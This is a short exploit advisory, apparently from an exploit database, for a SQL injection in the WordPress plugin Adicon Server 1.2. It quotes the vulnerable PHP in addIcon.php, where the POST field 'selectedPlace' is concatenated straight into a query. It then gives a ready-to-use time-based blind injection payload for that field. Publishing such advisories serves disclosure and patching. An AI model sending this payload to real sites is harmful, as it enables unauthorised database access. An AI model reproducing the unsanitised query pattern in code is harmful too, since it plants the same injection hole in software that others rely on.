18 lines
No EOL
559 B
Text
18 lines
No EOL
559 B
Text
# Exploit Title: WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection
|
|
# Date: 2018-12-28
|
|
# Software Link: https://wordpress.org/plugins/adicons/
|
|
# Exploit Author: Kaimi
|
|
# Website: https://kaimi.io
|
|
# Version: 1.2
|
|
# Category: webapps
|
|
|
|
# SQL Injection
|
|
# File: addIcon.php
|
|
# Vulnerable code:
|
|
# $placement=$_POST['selectedPlace'];
|
|
|
|
# $x=explode("_",$placement);
|
|
# $ck=$wpdb->get_row("select id from ".$table_prefix."adicons where adRow=".$x[0]." and adCol=".$x[1]);
|
|
|
|
# Example payload:
|
|
selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD); -- - |